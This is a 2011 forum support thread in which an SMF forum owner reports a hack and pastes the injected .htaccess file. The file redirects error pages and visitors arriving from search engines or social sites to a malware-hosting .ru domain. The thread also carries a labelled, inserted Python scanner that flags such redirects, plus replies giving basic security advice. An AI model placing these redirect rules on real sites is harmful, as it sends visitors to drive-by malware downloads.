help! site hacked, google blocked smf 2 rc 4

Started by giz, January 26, 2011, 08:59:26 AM

giz

help!!!
my site has been hacked, last night one of our members emailed me reporting that the website was being redirected to somewhere else. unfortunately i did not get this message and in the meantime google has blocked the website.
i am currently using smf 2 rc4 and digistore 4.0 which i have just removed.
how do i find the malware?
the only thing google has told me is:

Of the 5 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-01-25, and the last time suspicious content was found on this site was on 2011-01-25.

Malicious software is hosted on 1 domain(s), including lampapomontage.ru/.

This site was hosted on 1 network(s) including AS51468 (ONECOM).

giz

unfortunately the last time i backed up the whole site i was using smf 1.12
but it looks like a .htaccess file has been added to the root folder.
here are the contents:

RewriteEngine On
ErrorDocument 400 http://lampapomontage.ru/in.cgi?8
ErrorDocument 401 http://lampapomontage.ru/in.cgi?8
ErrorDocument 403 http://lampapomontage.ru/in.cgi?8
ErrorDocument 404 http://lampapomontage.ru/in.cgi?8
ErrorDocument 500 http://lampapomontage.ru/in.cgi?8
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://lampapomontage.ru/in.cgi?8 [R=301,L]

i'll delete this file now but is there a tool i can use to scan the whole site for malware?
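
Added example, not part of the original thread or of any participant's post: a small Python check that walks a web root and flags `.htaccess` directives of the kind quoted above, meaning `ErrorDocument` or `RewriteRule` targets on a host that is not the site's own, and notes when the redirect is gated on `HTTP_REFERER`. The function names, the `own_hosts` parameter and the shortened sample are assumptions made for illustration.

```python
import os
from urllib.parse import urlparse

# Constructed sample, shortened from the injected file quoted above.
SAMPLE = """RewriteEngine On
ErrorDocument 404 http://lampapomontage.ru/in.cgi?8
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.*
RewriteRule ^(.*)$ http://lampapomontage.ru/in.cgi?8 [R=301,L]
RewriteRule ^index\\.html$ /forum/index.php [L]
"""

def external_host(target, own_hosts):
    """Host of an absolute http(s) URL that is not one of ours, else None."""
    url = urlparse(target)
    host = (url.hostname or "").lower()
    offsite = url.scheme in ("http", "https") and host and host not in own_hosts
    return host if offsite else None

def scan_htaccess(text, own_hosts):
    """Return (line_no, kind, host) for directives that send visitors off-site."""
    findings, referer_gate = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        name = parts[0].lower() if parts else ""
        if name == "rewritecond" and len(parts) > 1:
            # Conditions accumulate until the next RewriteRule consumes them.
            referer_gate |= "http_referer" in parts[1].lower()
        elif name in ("errordocument", "rewriterule") and len(parts) >= 3:
            host = external_host(parts[2], own_hosts)
            if host and name == "errordocument":
                findings.append((no, "errordocument-offsite", host))
            elif host:
                kind = "referer-gated-redirect" if referer_gate else "offsite-redirect"
                findings.append((no, kind, host))
            if name == "rewriterule":
                referer_gate = False
    return findings

def scan_tree(root, own_hosts):
    """Scan every .htaccess under root; returns {path: findings} for hits only."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_htaccess(fh.read(), own_hosts)
            if found:
                hits[path] = found
    return hits
```

Run `scan_tree` on a downloaded copy of the site with `own_hosts` set to the forum's own domain names; a clean `.htaccess` that only redirects within the site produces no findings.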

giz

there was also a banner added to the attachments folder

Illori

did you check all your files to see if any had been edited? did you contact your host to let them know?

giz

the host is one.com and were not very helpful at all :-[
i'm just going through them all with filezilla and checking the last modified date, if the date is yesterday then i'll edit them but so far all is ok with the forum, i think it's just a case of ftp hack and redirecting visitors to another site.
i've changed all passwords now and i need to look at more security. any advice on good free website security and a scanner of some sort would be appreciated

Illori

you might want to post in the hosting board and see if you can find a new host that is more secure than this one.

CASMAN

Giz I am also interested in Website Security
I found this Security website
Says Security and Performance Applications
I don't know the reputation of the Company but will Check Later
https://www.alertsite.com/aslp_sec_vscan.html?ascamp=msn_security_scan
When you truly learn to walk the winds, you will never fall down.

Aleksi "Lex" Kilpinen

CASMAN - If you do not know the reputation of a Security software or Site, you should NOT be advertising it. There are loads of rogue security software around, and so you should advertise (link to) only software you really trust yourself.
Slava Ukraini!
"Before you allow people access to your forum, especially in an administrative position, you must be aware that that person can seriously damage your forum. Therefore, you should only allow people that you trust, implicitly, to have such access." -Douglas
